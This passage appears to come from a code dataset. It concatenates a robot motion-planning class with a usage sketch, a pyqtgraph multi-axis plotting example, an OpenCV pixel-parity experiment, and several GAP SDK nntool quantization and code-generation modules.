), len(self.move_group_joint_indices)
assert len(self.joint_acc_limits) == len(self.move_group_joint_indices)
def generate_collision_pair(self, sample_time = 1000000, echo_freq = 100000):
print("Since no SRDF file is provided. We will first detect link pairs that will always collide. This may take several minutes.")
n_link = len(self.user_link_names)
cnt = np.zeros((n_link, n_link), dtype=np.int32)
for i in range(sample_time):
qpos = self.pinocchio_model.get_random_configuration()
self.robot.set_qpos(qpos, True)
collisions = self.planning_world.collide_full()
for collision in collisions:
u = self.link_name_2_idx[collision.link_name1]
v = self.link_name_2_idx[collision.link_name2]
cnt[u][v] += 1
if i % echo_freq == 0:
print("Finish %.1f%%!" % (i * 100 / sample_time))
import xml.etree.ElementTree as ET
from xml.dom import minidom
root = ET.Element('robot')
robot_name = self.urdf.split('/')[-1].split('.')[0]
root.set('name', robot_name)
self.srdf = self.urdf.replace(".urdf", ".srdf")
for i in range(n_link):
for j in range(n_link):
if cnt[i][j] == sample_time:
link1 = self.user_link_names[i]
link2 = self.user_link_names[j]
print("Ignore collision pair: (%s, %s), reason: always collide" % (link1, link2))
collision = ET.SubElement(root, 'disable_collisions')
collision.set('link1', link1)
collision.set('link2', link2)
collision.set('reason', 'Default')
srdffile = open(self.srdf, "w")
srdffile.write(minidom.parseString(ET.tostring(root)).toprettyxml(indent=" "))
srdffile.close()
print("Saving the SRDF file to %s" % self.srdf)
def distance_6D(self, p1, q1, p2, q2):
return np.linalg.norm(p1 - p2) + min(
np.linalg.norm(q1 - q2), np.linalg.norm(q1 + q2)
)
def check_joint_limit(self, q):
n = len(q)
flag = True
for i in range(n):
if self.joint_types[i].startswith("JointModelR"):
if np.abs(q[i] - self.joint_limits[i][0]) < 1e-3:
continue
q[i] -= (
2
* np.pi
* np.floor((q[i] - self.joint_limits[i][0]) / (2 * np.pi))
)
if q[i] > self.joint_limits[i][1] + 1e-3:
flag = False
else:
if (
q[i] < self.joint_limits[i][0] - 1e-3
or q[i] > self.joint_limits[i][1] + 1e-3
):
flag = False
return flag
def IK(self, goal_pose, start_qpos, mask = [], n_init_qpos=20, threshold=1e-3):
index = self.link_name_2_idx[self.move_group]
min_dis = 1e9
idx = self.move_group_joint_indices
qpos0 = np.copy(start_qpos)
results = []
self.robot.set_qpos(start_qpos, True)
for i in range(n_init_qpos):
ik_results = self.pinocchio_model.compute_IK_CLIK(
index, goal_pose, start_qpos, mask
)
flag = self.check_joint_limit(ik_results[0]) # will clip qpos
# check collision
self.planning_world.set_qpos_all(ik_results[0][idx])
if (len(self.planning_world.collide_full()) != 0):
flag = False
if flag:
self.pinocchio_model.compute_forward_kinematics(ik_results[0])
new_pose = self.pinocchio_model.get_link_pose(index)
tmp_dis = self.distance_6D(
goal_pose[:3], goal_pose[3:], new_pose[:3], new_pose[3:]
)
if tmp_dis < min_dis:
min_dis = tmp_dis
if tmp_dis < threshold:
result = ik_results[0]
unique = True
for j in range(len(results)):
if np.linalg.norm(results[j][idx] - result[idx]) < 0.1:
unique = False
if unique:
results.append(result)
start_qpos = self.pinocchio_model.get_random_configuration()
mask_len = len(mask)
if mask_len > 0:
for j in range(mask_len):
if mask[j]:
start_qpos[j] = qpos0[j]
if len(results) != 0:
status = "Success"
elif min_dis != 1e9:
status = (
"IK Failed! Distance %lf is greater than threshold %lf."
% (min_dis, threshold)
)
else:
status = "IK Failed! Cannot find valid solution."
return status, results
def TOPP(self, path, step=0.1, verbose=False):
N_samples = path.shape[0]
dof = path.shape[1]
assert dof == len(self.joint_vel_limits)
assert dof == len(self.joint_acc_limits)
ss = np.linspace(0, 1, N_samples)
path = ta.SplineInterpolator(ss, path)
pc_vel = constraint.JointVelocityConstraint(self.joint_vel_limits)
pc_acc = constraint.JointAccelerationConstraint(self.joint_acc_limits)
instance = algo.TOPPRA(
[pc_vel, pc_acc], path, parametrizer="ParametrizeConstAccel"
)
jnt_traj = instance.compute_trajectory()
ts_sample = np.linspace(
0, jnt_traj.duration, int(jnt_traj.duration / step)
)
qs_sample = jnt_traj(ts_sample)
qds_sample = jnt_traj(ts_sample, 1)
qdds_sample = jnt_traj(ts_sample, 2)
return ts_sample, qs_sample, qds_sample, qdds_sample, jnt_traj.duration
def update_point_cloud(self, pc, resolution=1e-3):
self.planning_world.update_point_cloud(pc, resolution)
def update_attached_box(self, size, pose, link_id=-1):
if link_id == -1:
link_id = self.move_group_link_id
self.planning_world.update_attached_box(size, link_id, pose)
def plan(
self,
goal_pose,
current_qpos,
mask = [],
time_step=0.1,
rrt_range=0.1,
planning_time=1,
fix_joint_limits=True,
use_point_cloud=False,
use_attach=False,
verbose=False,
):
self.planning_world.set_use_point_cloud(use_point_cloud)
self.planning_world.set_use_attach(use_attach)
n = current_qpos.shape[0]
if fix_joint_limits:
for i in range(n):
if current_qpos[i] < self.joint_limits[i][0]:
current_qpos[i] = self.joint_limits[i][0] + 1e-3
if current_qpos[i] > self.joint_limits[i][1]:
current_qpos[i] = self.joint_limits[i][1] - 1e-3
self.robot.set_qpos(current_qpos, True)
collisions = self.planning_world.collide_full()
if len(collisions) != 0:
print("Invalid start state!")
for collision in collisions:
print("%s and %s collide!" % (collision.link_name1, collision.link_name2))
idx = self.move_group_joint_indices
ik_status, goal_qpos = self.IK(goal_pose, current_qpos, mask)
if ik_status != "Success":
return {"status": ik_status}
if verbose:
print("IK results:")
for i in range(len(goal_qpos)):
print(goal_qpos[i])
goal_qpos_ = []
for i in range(len(goal_qpos)):
goal_qpos_.append(goal_qpos[i][idx])
self.robot.set_qpos(current_qpos, True)
status, path = self.planner.plan(
current_qpos[idx],
goal_qpos_,
range=rrt_range,
verbose=verbose,
time=planning_time,
)
if status == "Exact solution":
if verbose:
ta.setup_logging("INFO")
else:
ta.setup_logging("WARNING")
times, pos, vel, acc, duration = self.TOPP(path, time_step)
return {
"status": "Success",
"time": times,
"position": pos,
"velocity": vel,
"acceleration": acc,
"duration": duration,
}
else:
return {"status": "RRT Failed. %s" % status}
def plan_screw(
self,
target_pose,
qpos,
qpos_step=0.1,
time_step=0.1,
use_point_cloud=False,
use_attach=False,
verbose=False,
):
self.planning_world.set_use_point_cloud(use_point_cloud)
self.planning_world.set_use_attach(use_attach)
qpos = np.copy(qpos)
self.robot.set_qpos(qpos, True)
def pose7D2mat(pose):
mat = np.eye(4)
mat[0:3, 3] = pose[:3]
mat[0:3, 0:3] = quat2mat(pose[3:])
return mat
def skew(vec):
return np.array(
[
[0, -vec[2], vec[1]],
[vec[2], 0, -vec[0]],
[-vec[1], vec[0], 0],
]
)
def pose2exp_coordinate(pose: np.ndarray) -> Tuple[np.ndarray, float]:
def rot2so3(rotation: np.ndarray):
assert rotation.shape == (3, 3)
if np.isclose(rotation.trace(), 3):
return np.zeros(3), 1
if np.isclose(rotation.trace(), -1):
return np.zeros(3), -1e6
theta = np.arccos((rotation.trace() - 1) / 2)
omega = (
1
/ 2
/ np.sin(theta)
* np.array(
[
rotation[2, 1] - rotation[1, 2],
rotation[0, 2] - rotation[2, 0],
rotation[1, 0] - rotation[0, 1],
]
).T
)
return omega, theta
omega, theta = rot2so3(pose[:3, :3])
if theta < -1e5:
return omega, theta
ss = skew(omega)
inv_left_jacobian = (
np.eye(3) / theta
- 0.5 * ss
+ (1.0 / theta - 0.5 / np.tan(theta / 2)) * ss @ ss
)
v = inv_left_jacobian @ pose[:3, 3]
return np.concatenate([v, omega]), theta
self.pinocchio_model.compute_forward_kinematics(qpos)
ee_index = self.link_name_2_idx[self.move_group]
current_p = pose7D2mat(self.pinocchio_model.get_link_pose(ee_index))
target_p = pose7D2mat(target_pose)
relative_transform = target_p @ np.linalg.inv(current_p)
omega, theta = pose2exp_coordinate(relative_transform)
if theta < -1e4:
return {"status": "screw plan failed."}
omega = omega.reshape((-1, 1)) * theta
index = self.move_group_joint_indices
path = [np.copy(qpos[index])]
while True:
self.pinocchio_model.compute_full_jacobian(qpos)
J = self.pinocchio_model.get_link_jacobian(ee_index, local=False)
delta_q = np.linalg.pinv(J) @ omega
delta_q *= qpos_step / (np.linalg.norm(delta_q))
delta_twist = J @ delta_q
flag = False
if np.linalg.norm(delta_twist) > np.linalg.norm(omega):
ratio = np.linalg.norm(omega) / np.linalg.norm(delta_twist)
delta_q = delta_q * ratio
delta_twist = delta_twist * ratio
flag = True
qpos += delta_q.reshape(-1)
omega -= delta_twist
def check_joint_limit(q):
n = len(q)
for i in range(n):
if (
q[i] < self.joint_limits[i][0] - 1e-3
or q[i] > self.joint_limits[i][1] + 1e-3
):
return False
return True
within_joint_limit = check_joint_limit(qpos)
self.planning_world.set_qpos_all(qpos[index])
collide = self.planning_world.collide()
if (
np.linalg.norm(delta_twist) < 1e-4
or collide
or within_joint_limit == False
):
return {"status": "screw plan failed"}
path.append(np.copy(qpos[index]))
if flag:
if verbose:
ta.setup_logging("INFO")
else:
ta.setup_logging("WARNING")
times, pos, vel, acc, duration = self.TOPP(
np.vstack(path), time_step
)
return {
"status": "Success",
"time": times,
"position": pos,
"velocity": vel,
"acceleration": acc,
"duration": duration,
}
```
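A minimal usage sketch of the `Planner` class above (not part of the original module). The URDF path and the link/joint names are hypothetical placeholders for a 7-DoF arm; the goal pose uses the 7D `[x, y, z, qw, qx, qy, qz]` layout that the IK distance check and `plan_screw` assume.
```python
# Hypothetical example; substitute the file and names from your own robot model.
import numpy as np
from mplib.planner import Planner

link_names = ["base_link", "link1", "link2", "link3",
              "link4", "link5", "link6", "ee_link"]          # placeholder names
joint_names = ["joint1", "joint2", "joint3", "joint4",
               "joint5", "joint6", "joint7"]                 # placeholder names

planner = Planner(
    urdf="robot.urdf",         # a robot.srdf next to it is picked up automatically
    user_link_names=link_names,
    user_joint_names=joint_names,
    move_group="ee_link",
    joint_vel_limits=np.ones(7),
    joint_acc_limits=np.ones(7),
)

result = planner.plan(
    goal_pose=[0.4, 0.1, 0.3, 0.0, 1.0, 0.0, 0.0],   # [x, y, z, qw, qx, qy, qz]
    current_qpos=np.zeros(len(joint_names)),
    time_step=0.05,
)
if result["status"] == "Success":
    print("planned", len(result["time"]), "steps over", result["duration"], "s")
else:
    print(result["status"])
```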
{
"source": "0000matteo0000/pyqtgraph",
"score": 3
}
#### File: pyqtgraph/examples/MultiAxisPlotWidgetExample.py
```python
import numpy as np
import pyqtgraph as pg
from pyqtgraph.Qt.QtWidgets import QMainWindow
def mkStripedPen(colors, blending=0.0001, span=[0, 15], orientation="horizontal", width=2):
stops = []
stops_colors = []
previous = None
for i, color in enumerate(colors + [None]):
pos = i / len(colors)
if previous is not None:
stops.append(pos - blending)
stops_colors.append(previous)
if color is not None:
stops.append(pos)
stops_colors.append(color)
previous = color
return pg.ColorMap(stops, stops_colors, mapping=pg.ColorMap.REPEAT).getPen(span=span, orientation=orientation, width=width)
app = pg.mkQApp()
mw = QMainWindow()
mw.resize(800, 400)
pg.setConfigOption("background", "w")
pg.setConfigOption("foreground", "k")
mpw = pg.MultiAxisPlotWidget()
mw.setCentralWidget(mpw)
mw.show()
# LEGEND
mpw.addLegend(offset=(0, 0))
# TITLE
mpw.setTitle("MultiAxisPlotWidget Example")
# AXES
ax1 = mpw.addAxis("sx1", "bottom", text="Samples1", units="sx1")
ax1c = "red"
ax1.setPen(ax1c)
ax2 = mpw.addAxis("sx2", "bottom", text="Samples2", units="sx2")
ax2c = "green"
ax2.setPen(ax2c)
ay1 = mpw.addAxis("sy1", "left", text="Data1", units="sy1")
ay1c = "cyan"
ay1.setPen(ay1c)
ay2 = mpw.addAxis("sy2", "left", text="Data2", units="sy2")
ay2c = "magenta"
ay2.setPen(ay2c)
# CHARTS
c0, pi0 = mpw.addChart("Dataset 0")
c0.setPen("black")
c1, pi1 = mpw.addChart("Dataset 1", xAxisName="sx1", yAxisName="sy1")
c1.setPen(mkStripedPen([ax1c, ay1c]))
c2, pi2 = mpw.addChart("Dataset 2", xAxisName="sx2", yAxisName="sy1")
c2.setPen(mkStripedPen([ax2c, ay1c]))
c3, pi3 = mpw.addChart("Dataset 3", xAxisName="sx2", yAxisName="sy2")
c3.setPen(mkStripedPen([ax2c, ay2c]))
# make and display chart
mpw.makeLayout(
# optional, selects and orders axes displayed.
# remember to include the default axes if used.
axes=["bottom", "sx1", "sx2", "sy2", "sy1", "left"],
# optional, selects charts displayed
charts=["Dataset 0", "Dataset 1", "Dataset 2", "Dataset 3"]
)
mpw.enableAxisAutoRange()
for i, c in enumerate([c0, c1, c2, c3, ], start=1):
c.setData(np.array(np.sin(np.linspace(0, i * 2 * np.pi, num=1000))))
mpw.update()
# Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
pg.exec()
```
{
"source": "0000sir/opencv-graphic-experiments",
"score": 3
}
#### File: opencv-graphic-experiments/x-4/x-4.py
```python
import cv2
import numpy as np
def separate_frame(frame, width, height):
odd_frame = np.zeros((height, width, 3), np.uint8)
even_frame = np.zeros((height,width, 3), np.uint8)
for x in range(0, height-1):
for y in range(0, width-1):
point = frame[x, y]
r0 = point[2]%2==0 and point[2] or 0
g0 = point[1]%2==0 and point[1] or 0
b0 = point[0]%2==0 and point[0] or 0
r1 = point[2]%2==1 and point[2] or 0
g1 = point[1]%2==1 and point[1] or 0
b1 = point[0]%2==1 and point[0] or 0
even_frame[x,y] = [g0, r0, b0]
odd_frame[x,y] = [g1, r1, b1]
return (odd_frame, even_frame)
img = cv2.imread('../people.jpg')
#cv2.imshow('img', img)
height, width = img.shape[:2]
img0,img1 = separate_frame(img, width, height)
cv2.imshow('img-0', img0)
cv2.imshow('img-1', img1)
cv2.waitKey(0)
cv2.destroyAllWindows()
```
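The nested Python loops above visit every pixel individually, which is slow for full-size frames. Below is a hedged NumPy sketch (not part of the original repo) of the same parity split; it reproduces the `[G, R, B]` channel shuffle of the loop body but processes the whole image, whereas the `range(0, height-1)` / `range(0, width-1)` loops skip the last row and column.
```python
# Vectorized equivalent of separate_frame (illustrative sketch; assumes the
# channel shuffle in the loop above is intentional).
def separate_frame_vectorized(frame):
    even_mask = frame % 2 == 0
    even = frame * even_mask          # keep even-valued samples, zero the rest
    odd = frame * ~even_mask          # keep odd-valued samples, zero the rest
    shuffle = [1, 2, 0]               # BGR input written back as [G, R, B]
    return odd[:, :, shuffle], even[:, :, shuffle]
```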
{
"source": "00-01/gap_sdk",
"score": 2
}
#### File: nntool/execution/execution_progress.py
```python
class ExecutionProgress(object):
__instance = None
def __new__(cls):
if ExecutionProgress.__instance is None:
ExecutionProgress.__instance = object.__new__(cls)
return ExecutionProgress.__instance
def __init__(self):
if not hasattr(self, 'listeners'):
self.listeners = []
@classmethod
def progress(cls, step_idx, name):
inst = cls()
for func in inst.listeners:
func(step_idx, name)
@classmethod
def start(cls):
inst = cls()
for func in inst.listeners:
func(None, "start")
@classmethod
def end(cls):
inst = cls()
for func in inst.listeners:
func(None, "end")
@classmethod
def listen(cls, func):
inst = cls()
inst.listeners.append(func)
@classmethod
def unlisten(cls, func):
inst = cls()
inst.listeners.remove(func)
```
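A short usage sketch (not from the original sources): listeners are plain callables taking `(step_idx, name)`, and `start`/`end` report with `step_idx=None`. The listener and step names below are hypothetical.
```python
# Illustrative progress listener for the singleton above.
def report_progress(step_idx, name):
    if step_idx is None:
        print("execution", name)              # "start" or "end"
    else:
        print("step", step_idx, ":", name)

ExecutionProgress.listen(report_progress)
ExecutionProgress.start()
ExecutionProgress.progress(0, "input_node")   # hypothetical step names
ExecutionProgress.progress(1, "conv_layer")
ExecutionProgress.end()
ExecutionProgress.unlisten(report_progress)
```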
#### File: symbolic/q15_quantization/q15_scale_float.py
```python
from ..function import Function
from ..symbol import nargs, Constant, c_headers, copy_props
@nargs(1)
@c_headers('"Gap.h"')
@copy_props('to_qrec')
class Q15ScaleFloat(Function):
def __init__(self, *args, to_qrec=None, **kwargs):
self._to_qrec = to_qrec
super().__init__(*args, **kwargs)
@property
def to_qrec(self):
return self._to_qrec
def _eval(self, *args, **kwargs):
if isinstance(args[0], Constant):
return Constant(self._to_qrec.quantize_and_clip(args[0].value))
return args[0]
def _impl(self, *args, **kwargs):
val = args[0]
return self._to_qrec.quantize_and_clip(val)
def _py_expr(self, *args, **kwargs):
val = args[0]
return self._to_qrec.quantize_and_clip_py_expr(val)
def _c_expr(self, *args, **kwargs):
val = args[0]
return self._to_qrec.quantize_and_clip_c_expr(val)
def __repr__(self) -> str:
return f"ScaleFloat({self.contents[0]}, ->[{self._to_qrec}])"
```
#### File: generation/at_generators/cnn_pool_relu.py
```python
from .utils import at_bits
GEN_POOL_RELU = "CNN_PoolReLU"
# extern void CNN_PoolReLU(
# char *Name,
# CNN_GenControl_T *Ctrl,
# int In_DataSize,
# int Out_DataSize,
# int In_InL3, // 1 if In comes from L3, 0 if it comes from L2
# int Out_InL3,
# int InFeat,
# int OutFeat,
# int Width,
# int Height,
# KernelOper_T PoolOper,
# int Fpx,
# int Fpy,
# int Dpx,
# int Dpy,
# int Spx,
# int Spy,
# int PoolPad,
# KernelOper_T ReLUOper
# );
# pylint: disable=too-many-arguments
def gen_at_pool_relu(code_block, name, in_q, out_q, in_dim,
out_dim, at_pool, at_active, gen_ctrl=None, at_ver=3):
if gen_ctrl is None:
gen_ctrl = "0"
else:
gen_ctrl = gen_ctrl.ctrl_name
if at_pool.PoolOper == 'KOP_NONE':
if in_dim.is_named and in_dim.has_keys(['c', 'w', 'h']):
dims = [in_dim.c, in_dim.h, in_dim.w, in_dim.c]
else:
dims = in_dim.shape.copy()
dims = dims + [1] * (4 - len(dims))
if out_dim.is_named and out_dim.has_key('c'):
dims[3] = out_dim.c
else:
dims[3] = dims[0]
else:
dims = [in_dim.c, in_dim.h, in_dim.w, out_dim.c]
if at_ver < 3:
code_block.write('{}("{}", {}, {}, {}, 1, 1, {}, {}, {}, {},',
GEN_POOL_RELU, name, gen_ctrl, at_bits(in_q), at_bits(out_q),
dims[0], dims[3], dims[2], dims[1])
else:
code_block.write('{}("{}", {}, {}, {}, {}, {}, 1, 1, {}, {}, {}, {},',
GEN_POOL_RELU, name, gen_ctrl, at_bits(
in_q), at_bits(out_q), in_q.q, out_q.q,
dims[0], dims[3], dims[2], dims[1])
code_block.indent()
code_block.write('{}, {}, {}, {}, {}, {}, {}, {}, {});',
at_pool.PoolOper, at_pool.Fpx, at_pool.Fpy,
at_pool.Dpx, at_pool.Dpy, at_pool.Spx, at_pool.Spy,
at_pool.PoolPad, at_active.ReLUOper)
code_block.deindent()
```
#### File: nntool/generation/default_appl_main_template.py
```python
from .templet import stringfunction
import os
import numpy as np
GWT_HEADER = '''
/*
* Copyright (C) 2017 GreenWaves Technologies
* All rights reserved.
*
* This software may be modified and distributed under the terms
* of the BSD license. See the LICENSE file for details.
*
*/
'''
@stringfunction
# pylint: disable=unused-argument
def generate_main_appl_template(G, gen, test_inputs=None, test_outputs=None, tolerance=0.0):
'''
${GWT_HEADER}
/* Autotiler includes. */
#include "${gen.project_name}.h"
#include "${gen.project_name}Kernels.h"
#ifdef __EMUL__
#define pmsis_exit(n) exit(n)
#endif
#ifndef STACK_SIZE
#define STACK_SIZE 1024
#endif
${gen.flash_pointer} ${gen.project_name}_L3_Flash = 0;
${gen.generate_main_appl_inout_def(test_inputs, test_outputs)}
static void cluster()
{
#ifdef PERF
printf("Start timer\\n");
gap_cl_starttimer();
gap_cl_resethwtimer();
#endif
${gen.project_name}CNN(${gen.gen_inout_list()});
printf("Runner completed\\n");
${gen.generate_output_check(tolerance, indent=1) if test_outputs else ""}
}
int test_${gen.project_name}(void)
{
printf("Entering main controller\\n");
/* ---------------->
* Put here Your input settings
* <---------------
*/
#ifndef __EMUL__
/* Configure And open cluster. */
struct pi_device cluster_dev;
struct pi_cluster_conf cl_conf;
cl_conf.id = 0;
pi_open_from_conf(&cluster_dev, (void *) &cl_conf);
if (pi_cluster_open(&cluster_dev))
{
printf("Cluster open failed !\\n");
pmsis_exit(-4);
}
int cur_fc_freq = pi_freq_set(PI_FREQ_DOMAIN_FC, ${gen.opts['fc_freq']});
if (cur_fc_freq == -1)
{
printf("Error changing frequency !\\nTest failed...\\n");
pmsis_exit(-4);
}
int cur_cl_freq = pi_freq_set(PI_FREQ_DOMAIN_CL, ${gen.opts['cl_freq']});
if (cur_cl_freq == -1)
{
printf("Error changing frequency !\\nTest failed...\\n");
pmsis_exit(-5);
}
#ifdef __GAP9__
pi_freq_set(PI_FREQ_DOMAIN_PERIPH, 250000000);
#endif
#endif
// IMPORTANT - MUST BE CALLED AFTER THE CLUSTER IS SWITCHED ON!!!!
printf("Constructor\\n");
int ConstructorErr = ${gen.project_name}CNN_Construct();
if (ConstructorErr)
{
printf("Graph constructor exited with error: %d\\n(check the generated file ${gen.project_name}Kernels.c to see which memory have failed to be allocated)\\n", ConstructorErr);
pmsis_exit(-6);
}
printf("Call cluster\\n");
#ifndef __EMUL__
struct pi_cluster_task task = {0};
task.entry = cluster;
task.arg = NULL;
task.stack_size = (unsigned int) STACK_SIZE;
task.slave_stack_size = (unsigned int) SLAVE_STACK_SIZE;
pi_cluster_send_task_to_cl(&cluster_dev, &task);
#else
cluster();
#endif
${gen.project_name}CNN_Destruct();
#ifdef PERF
{
unsigned int TotalCycles = 0, TotalOper = 0;
printf("\\n");
for (unsigned int i=0; i<(sizeof(AT_GraphPerf)/sizeof(unsigned int)); i++) {
printf("%45s: Cycles: %10u, Operations: %10u, Operations/Cycle: %f\\n", AT_GraphNodeNames[i], AT_GraphPerf[i], AT_GraphOperInfosNames[i], ((float) AT_GraphOperInfosNames[i])/ AT_GraphPerf[i]);
TotalCycles += AT_GraphPerf[i]; TotalOper += AT_GraphOperInfosNames[i];
}
printf("\\n");
printf("%45s: Cycles: %10u, Operations: %10u, Operations/Cycle: %f\\n", "Total", TotalCycles, TotalOper, ((float) TotalOper)/ TotalCycles);
printf("\\n");
}
#endif
printf("Ended\\n");
pmsis_exit(0);
return 0;
}
int main(int argc, char *argv[])
{
printf("\\n\\n\\t *** NNTOOL ${gen.project_name} Example ***\\n\\n");
#ifdef __EMUL__
test_${gen.project_name}();
#else
return pmsis_kickoff((void *) test_${gen.project_name});
#endif
return 0;
}
'''
@stringfunction
# pylint: disable=unused-argument
def generate_main_appl_header(G, gen):
'''
#ifndef __${gen.project_name}_H__
#define __${gen.project_name}_H__
#define __PREFIX(x) ${gen.project_name} ## x
// Include basic GAP builtins defined in the Autotiler
#include "Gap.h"
#ifdef __EMUL__
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/param.h>
#include <string.h>
#endif
extern ${gen.flash_pointer} ${gen.project_name}_L3_Flash;
#endif
'''
@stringfunction
# pylint: disable=unused-argument
def generate_main_appl_make(G, gen, quantized, open_args=""):
'''
NNTOOL=nntool
${"MODEL_SQ8=1" if gen.G.has_expressions or "SQ8" in gen.G.quantization.schemes_present or any(qrec.cache.get("ne16") for qrec in G.quantization.values()) else "# MODEL_SQ8=1"}
${"MODEL_POW2=1" if "POW2" in gen.G.quantization.schemes_present else "# MODEL_POW2=1"}
${"MODEL_FP16=1" if any(qrec.ktype == "float" for qrec in G.quantization.values()) else "# MODEL_FP16=1"}
${"MODEL_NE16=1" if any(qrec.cache.get("ne16") for qrec in G.quantization.values()) else "# MODEL_NE16=1"}
MODEL_SUFFIX?=
MODEL_PREFIX?=${gen.project_name}
MODEL_PYTHON=python3
MODEL_BUILD=BUILD_MODEL$(MODEL_SUFFIX)
TRAINED_MODEL = ${os.path.split(G.graph_identity.filename)[1]}
MODEL_EXPRESSIONS = ${"$(MODEL_BUILD)/" + gen.opts['basic_kernel_source_file'] if gen.G.has_expressions else ""}
NNTOOL_EXTRA_FLAGS += ${open_args}
${"MODEL_QUANTIZED=1" if quantized else ""}
# Memory sizes for cluster L1, SoC L2 and Flash
TARGET_L1_SIZE = ${gen.opts['l1_size']}
TARGET_L2_SIZE = ${gen.opts['l2_size']}
TARGET_L3_SIZE = ${gen.opts['l3_size']}
# Cluster stack size for master core and other cores
CLUSTER_STACK_SIZE=${gen.opts['cluster_stack_size']}
CLUSTER_SLAVE_STACK_SIZE=${gen.opts['cluster_slave_stack_size']}
CLUSTER_NUM_CORES=${gen.opts['cluster_num_cores']}
NNTOOL_SCRIPT = nntool_script
${"APP_CFLAGS += -DSTD_FLOAT" if any(qrec[1].out_qs[0].dtype == np.float16 for qrec in G.quantization.sorted_iterator(G)) else ""}
${"APP_LDFLAGS += -lm" if gen.G.has_expressions and "FLOAT" in gen.G.quantization.schemes_present else ""}
$(info GEN ... $(CNN_GEN))
'''
@stringfunction
# pylint: disable=unused-argument
def generate_main_appl_make_atproject(G, gen, quantized, model_path):
'''
NNTOOL=nntool
${"MODEL_SQ8=1" if gen.G.has_expressions or "SQ8" in G.quantization.schemes_present or any(qrec.cache.get("ne16") for qrec in G.quantization.values()) else "# MODEL_SQ8=1"}
${"MODEL_POW2=1" if "POW2" in G.quantization.schemes_present else "# MODEL_POW2=1"}
${"MODEL_FP16=1" if "FLOAT" in G.quantization.schemes_present else "# MODEL_FP16=1"}
${"MODEL_NE16=1" if any(qrec.cache.get("ne16") for qrec in G.quantization.values()) else "# MODEL_NE16=1"}
MODEL_SUFFIX?=
MODEL_PREFIX?=${gen.project_name}
MODEL_PYTHON=python3
MODEL_BUILD=BUILD_MODEL$(MODEL_SUFFIX)
AT_MODEL_PATH=${model_path}
MODEL_EXPRESSIONS = ${gen.opts['basic_kernel_source_file'] if gen.G.has_expressions else ""}
${"MODEL_QUANTIZED=1" if quantized else ""}
# Memory sizes for cluster L1, SoC L2 and Flash
TARGET_L1_SIZE = ${gen.opts['l1_size']}
TARGET_L2_SIZE = ${gen.opts['l2_size']}
TARGET_L3_SIZE = ${gen.opts['l3_size']}
# Cluster stack size for master core and other cores
CLUSTER_STACK_SIZE=${gen.opts['cluster_stack_size']}
CLUSTER_SLAVE_STACK_SIZE=${gen.opts['cluster_slave_stack_size']}
CLUSTER_NUM_CORES=${gen.opts['cluster_num_cores']}
NNTOOL_SCRIPT = nntool_script
$(info GEN ... $(CNN_GEN))
'''
```
#### File: bindings/pow2/matscale_bindings_generator.py
```python
from generation.bindings import (CommentBindingList, GNodeArgEdge,
NodeBindingList)
from generation.generator_decorators import QREC_POW2, generation_function
from graph.types import MatScaleFusionParameters
@generation_function("bindings", (MatScaleFusionParameters,), qrec_types=(QREC_POW2, ))
def matscale_bindings_generator(gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
set_matscale_bindings(gen, in_eparams, out_eparams, cname, node, qrec)
return True
def set_matscale_bindings(gen, in_eparams, out_eparams, cname, params, node_q):
if params.fusion_type == "vec_scalar":
gen.bindings.append(
CommentBindingList("Node {} inq1 {} inq2 {} inq3 {} outq {}", params.name,
node_q.in_qs[0].q, node_q.in_qs[1].q,
node_q.in_qs[2].q, node_q.out_qs[0].q)
)
gen.bindings.append(
NodeBindingList(cname, GNodeArgEdge(in_eparams[0]),
GNodeArgEdge(in_eparams[1]), GNodeArgEdge(
in_eparams[2]),
GNodeArgEdge(out_eparams[0], "GNA_OUT")))
else:
gen.bindings.append(
CommentBindingList("Node {} inq1 {} inq2 {} outq {}", params.name,
node_q.in_qs[0].q, node_q.in_qs[1].q, node_q.out_qs[0].q)
)
gen.bindings.append(
NodeBindingList(cname, GNodeArgEdge(in_eparams[0]), GNodeArgEdge(in_eparams[1]),
GNodeArgEdge(out_eparams[0], "GNA_OUT")))
```
#### File: kernels/mult8/rnn_kernels_generator.py
```python
import logging
from generation.at_types.gen_ctrl import GenCtrl
from generation.code_block import CodeBlock
from generation.generator_decorators import generation_function, QREC_MULT8
from graph.types import RNNParameters, LSTMParameters, GRUParameters
from ..autotiler_kernel import AutotilerKernel
LOG = logging.getLogger("nntool." + __name__)
@generation_function("kernels", (RNNParameters, LSTMParameters, GRUParameters), qrec_types=(QREC_MULT8, ))
def rnn_kernels_generator(gen, node, qrec, in_eparams, out_eparams, cname):
del in_eparams, out_eparams, qrec
gen.kernels.append(RNNKernel(node.name, cname, node,
at_ver=gen.opts['at_ver'],
gen_ctrl=node.get_gen_ctrl()))
return True
# int RNN_Stack_SQ8(
# char *Name,
# CNN_GenControl_T *Ctrl,
# int BiasDataSize,
# int FeatDataSize,
# int NCells,
# int K0,
# int K1,
# int DimState,
# int DimIn,
# int AlwaysReset,
# int Revert
# );
# int LSTM_Stack_SQ8(
# char *Name,
# CNN_GenControl_T *Ctrl,
# int BiasDataSize,
# int FeatDataSize,
# int NCells,
# int K0,
# int K1,
# int DimState,
# int DimIn,
# int AlwaysReset,
# int Revert
# );
# int GRU_Stack_SQ8(
# char *Name,
# CNN_GenControl_T *Ctrl,
# int BiasDataSize,
# int FeatDataSize,
# int NCells,
# int K0,
# int K1,
# int DimState,
# int DimIn,
# int AlwaysReset,
# int Revert
# );
def gen_rnn_sq8(code_block, kname, cname, ctrl, ncells, k0, k1, dim_state, dim_in, revert):
code_block.write(
'{}("{}", {}, 4, 1, {}, {}, {}, {}, {}, 0, {});'.format(kname, cname, ctrl,
ncells, k0,
k1, dim_state,
dim_in,
revert))
class RNNKernel(AutotilerKernel):
def __init__(self, node_name, cname, rnn_params, gen_ctrl=None, at_ver=3):
if gen_ctrl is None:
self.gen_ctrl = GenCtrl(None, cname=cname)
else:
gen_ctrl.cname = cname
self.gen_ctrl = gen_ctrl
if isinstance(rnn_params, RNNParameters):
self.kname = "RNN_Stack_SQ8"
elif isinstance(rnn_params, LSTMParameters):
self.kname = "LSTM_Stack_SQ8"
elif isinstance(rnn_params, GRUParameters):
self.kname = "GRU_Stack_SQ8"
if not rnn_params.linear_before_reset:
# gen_ctrl.linear_before_reset = 0
raise ValueError("In {} linear_before_reset == 0 not supported by the Autotiler kernels")
else:
raise ValueError("unknown RNN parameter type")
self.n_cells = rnn_params.n_cells
self.n_states = rnn_params.n_states
